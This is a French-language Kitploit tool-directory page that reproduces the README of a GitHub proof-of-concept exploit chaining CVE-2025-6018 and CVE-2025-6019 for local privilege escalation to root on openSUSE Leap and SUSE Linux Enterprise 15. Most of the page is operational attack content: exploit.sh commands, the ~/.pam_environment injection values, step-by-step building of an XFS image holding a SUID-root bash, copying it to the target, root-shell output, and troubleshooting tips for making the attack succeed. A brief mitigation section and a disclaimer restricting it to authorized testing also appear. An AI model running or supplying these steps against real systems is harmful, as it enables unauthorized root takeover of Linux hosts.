Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6018-6019 — CVE-2025-6018 CVE-2025-6019 Exploit PoC - Élévation de privilèges locale dans openSUSE/SUSE Linux Enterprise 15 - Contournement de PAM + condition de course XFS udisks2 LPE vers root | Kitploit
Outils/GitHubGitHub/desertdemons/cve-2025-6018-6019
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionArticles et RechercheApprentissage et ÉducationExploitation de Binaires
GitHubdesertdemons/cve-2025-6018-6019

CVE-2025-6018-6019

CVE-2025-6018 CVE-2025-6019 Exploit PoC - Élévation de privilèges locale dans openSUSE/SUSE Linux Enterprise 15 - Contournement de PAM + condition de course XFS udisks2 LPE vers root

Voir le dépôt
41il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-6018 CVE-2025-6019 PoC Exploit

Élévation de privilèges locale (LPE) - openSUSE / SUSE Linux Enterprise 15

CVE-2025-6018 CVE-2025-6019 PoC Exploit License

PoC/Exploit fonctionnel pour CVE-2025-6018 et CVE-2025-6019 - Élévation de privilèges d'un utilisateur non privilégié à root sur openSUSE Leap 15.x et SUSE Linux Enterprise 15.x

🎯 Résumé rapide

ID CVEVulnérabilitéImpact
CVE-2025-6018Injection de variables d'environnement PAMContournement vers le statut polkit allow_active
CVE-2025-6019Course critique lors du redimensionnement XFS udisks2/libblockdevShell root

Chaîne d'attaque

root@kitploit:~
Unprivileged SSH User → [CVE-2025-6018] → allow_active → [CVE-2025-6019] → ROOT

🔥 Démonstration du PoC

root@kitploit:~
# Check vulnerability
./exploit.sh --check

# Setup PAM bypass (CVE-2025-6018)
./exploit.sh --setup

# Reconnect SSH, then: su - $USER

# Exploit (CVE-2025-6019)
./exploit.sh --exploit /tmp/xfs.img

# Result: ROOT SHELL
uid=1000(user) gid=1000(user) euid=0(root)

📥 Installation

root@kitploit:~
git clone https://github.com/DesertDemons/CVE-2025-6018-6019.git
cd CVE-2025-6018-6019
chmod +x *.sh

🎯 Systèmes affectés

  • ✅ openSUSE Leap 15.0, 15.1, 15.2, 15.3, 15.4, 15.5, 15.6
  • ✅ SUSE Linux Enterprise Server (SLES) 15 SP1-SP6
  • ✅ SUSE Linux Enterprise Desktop (SLED) 15 SP1-SP6

⚠️ Note : openSUSE Leap 15.6 arrive en fin de vie le 30 avril 2026. Après cette date, aucun correctif de sécurité ne sera publié. Les utilisateurs devraient migrer vers Leap 16.0 ou SLES avec support étendu.

Composants vulnérables

  • PAM (Linux-PAM 1.3.0 - 1.6.0) avec user_readenv=1
  • udisks2 2.9.x avec libblockdev
  • polkit avec allow_active: yes pour les actions udisks2

📖 Utilisation

Option 1 : Vérifier la vulnérabilité

root@kitploit:~
./exploit.sh --check

Option 2 : Configurer le contournement PAM (CVE-2025-6018)

root@kitploit:~
./exploit.sh --setup
# Then: exit SSH, reconnect, run: su - $USER

Option 3 : Exploiter (CVE-2025-6019)

root@kitploit:~
./exploit.sh --exploit /tmp/xfs.img

Option 4 : Mode entièrement automatique

root@kitploit:~
./exploit.sh --auto /tmp/xfs.img

Option 5 : Afficher les instructions de création d'image

root@kitploit:~
./exploit.sh --create-image

🛠️ Création de l'image de charge utile XFS

À exécuter sur la machine de l'ATTAQUANT en tant que root :

⚠️ Vous DEVEZ utiliser le binaire /usr/bin/bash de la victime, pas celui de votre machine locale. Un binaire bash provenant d'une autre distribution (Kali, Arch, Ubuntu, etc.) échouera sur la cible en raison d'une incompatibilité ABI glibc/bibliothèques partagées — même sur la même architecture x86_64.

Utilisation du script d'assistance (recommandé)

Le script détecte automatiquement votre version de xfsprogs et applique les options correctes :

root@kitploit:~
# Get victim's bash first
scp user@target:/usr/bin/bash /tmp/victim_bash

# Create image (auto-detects safe mkfs flags)
sudo ./create_image.sh /tmp/victim_bash xfs.img

# For SUSE 15 SP1-SP4 targets (kernel < 5.14), use compatibility mode:
sudo ./create_image.sh --compat /tmp/victim_bash xfs.img

Création manuelle

root@kitploit:~
sudo su -

# 1. Get victim's bash binary
scp user@target:/usr/bin/bash /tmp/bash

# 2. Create 300MB XFS image with safe flags
dd if=/dev/zero of=xfs.img bs=1M count=300
mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img

# 3. Mount with SUID support
mkdir -p /tmp/mnt
mount -o loop,suid xfs.img /tmp/mnt

# 4. Copy victim's bash and set SUID bit
cp /tmp/bash /tmp/mnt/xpl
chmod 4755 /tmp/mnt/xpl
chown root:root /tmp/mnt/xpl
ls -la /tmp/mnt/xpl  # MUST show: -rwsr-xr-x

# 5. Unmount and transfer
umount /tmp/mnt
scp xfs.img user@target:/tmp/

Compatibilité du format XFS

L'image XFS doit être formatée avec des options compatibles avec le noyau de la cible. Les versions récentes de xfsprogs activent par défaut des fonctions sur disque que les anciens noyaux SUSE ne peuvent pas lire, ce qui provoque des erreurs wrong fs type, bad superblock lors du montage de redimensionnement udisks2.

CibleNoyauCommande mkfs.xfs
SUSE 15 SP5-SP65.14 / 6.4mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img
SUSE 15 SP1-SP44.12 - 5.3mkfs.xfs -f -m crc=0,reflink=0 xfs.img

Pourquoi ? exchange et parent sont des fonctions du noyau 6.10+ (activées par défaut dans xfsprogs 6.x). bigtime, inobtcount et nrext64 sont des fonctions du noyau 5.10+. La commande « compat » SP1-SP4 (-m crc=0,reflink=0) crée un format XFS V4 avec toutes les fonctions modernes désactivées, qui fonctionne sur tous les SP de SUSE 15.

🔬 Détails techniques

CVE-2025-6018 : Injection d'environnement PAM

Vulnérabilité : le module pam_env de PAM lit ~/.pam_environment avec user_readenv=1 (valeur par défaut sur SUSE), ce qui permet l'injection de variables d'environnement.

Exploit : définir XDG_SEAT=seat0 et XDG_VTNR=1 pour tromper systemd-logind et lui faire accorder les privilèges polkit allow_active.

root@kitploit:~
# ~/.pam_environment
XDG_SEAT=seat0
XDG_VTNR=1

CVE-2025-6019 : Course critique lors du redimensionnement XFS

Vulnérabilité : lors du redimensionnement d'un système de fichiers XFS via udisks2, libblockdev monte temporairement le système de fichiers sans l'option nosuid.

Exploit :

  1. Créer une image XFS avec un binaire root SUID
  2. Configurer un périphérique loop
  3. Déclencher le redimensionnement via D-Bus
  4. Gagner la course pour exécuter le binaire SUID pendant le montage temporaire
  5. Obtenir un shell root

📋 Guide complet d'exploitation

Étape 1 : Vérifier la vulnérabilité

root@kitploit:~
./exploit.sh --check

Sortie :

root@kitploit:~
[+] pam_env.so found in PAM configuration
[+] pam_systemd.so found - escalation vector available
[+] Target OS is vulnerable (openSUSE/SLES)
[-] allow_active status: NO

Étape 2 : Configurer le contournement PAM

root@kitploit:~
./exploit.sh --setup
exit
ssh user@target
su - $USER

Étape 3 : Vérifier allow_active

root@kitploit:~
./exploit.sh --check

Sortie :

root@kitploit:~
[+] allow_active status: YES
    You have allow_active privileges!

Étape 4 : Transférer l'image XFS

root@kitploit:~
# On attacker:
scp xfs.img user@target:/tmp/

Étape 5 : Exploiter

root@kitploit:~
./exploit.sh --exploit /tmp/xfs.img

Sortie :

root@kitploit:~
[+] Loop device created: /dev/loop0
[+] Loop device verified as XFS
[*] Starting race condition loop...
[*] Triggering XFS resize on loop0...

=== ROOT SHELL OBTAINED ===
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)

root@target#

🔧 Dépannage

🛡️ Atténuation

Correctif immédiat

root@kitploit:~
# Disable user_readenv in PAM
sed -i 's/user_readenv=1/user_readenv=0/g' /etc/pam.d/common-auth

# Or restrict udisks2 polkit policy
# Change allow_active from "yes" to "auth_admin"

Correctifs fournisseur

  • Mettre à jour les paquets PAM, udisks2 et libblockdev
  • Consulter les avis de sécurité SUSE

📚 Références

  • Qualys Security Advisory
  • Qualys Technical Write-up
  • SUSE CVE-2025-6018
  • SUSE CVE-2025-6019
  • NVD CVE-2025-6018
  • NVD CVE-2025-6019

🏆 Crédits

  • Qualys Threat Research Unit - Découverte originale de la vulnérabilité
  • DesertDemons - Développement de l'exploit PoC
  • Jazzruran - Rapport de bug et correctif pour l'incompatibilité de version xfsprogs (#1)

⚠️ Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. Les auteurs ne sont pas responsables de toute utilisation abusive.

📄 Licence

Licence MIT


🔍 Mots-clés

CVE-2025-6018 CVE-2025-6019 PoC Proof of Concept Exploit Privilege Escalation LPE Local Privilege Escalation Root openSUSE SUSE SLES PAM pam_env udisks2 libblockdev


⭐ Mettez une étoile à ce dépôt s'il vous a aidé ! ⭐

Télécharger l’outil
ProblèmeCauseSolution
allow_active: NOContournement PAM inactifExécutez --setup, quittez SSH, reconnectez-vous, puis exécutez su - $USER
Image is not XFSMauvais format de système de fichiersUtilisez mkfs.xfs, pas mkfs.ext4
SUID not workingPermissions non définiesVérifiez les permissions -rwsr-xr-x sur la machine de l'attaquant
Race condition missedProblème de synchronisationRelancez l'exploit (fonctionne généralement en 1 à 3 tentatives)
Le binaire SUID provoque un segfault ou GLIBC_x.xx not foundBinaire bash provenant d'une mauvaise distribution (incompatibilité glibc/ABI)Utilisez le binaire /usr/bin/bash de la victime via scp, pas votre bash local
Resize output: Error resizing filesystem on /dev/loopN: Failed to mount '/dev/loopN' before resizing it: wrong fs type, bad option, bad superblock on /dev/loopN, missing codepage or helper program, or other errorImage XFS formatée avec des fonctions que le noyau cible ne peut pas lire (incompatibilité de version de xfsprogs)Créez l'image avec mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img pour SP5/SP6, ou mkfs.xfs -f -m crc=0,reflink=0 xfs.img pour SP1-SP4
XFS
Race Condition
Security
Vulnerability
Pentest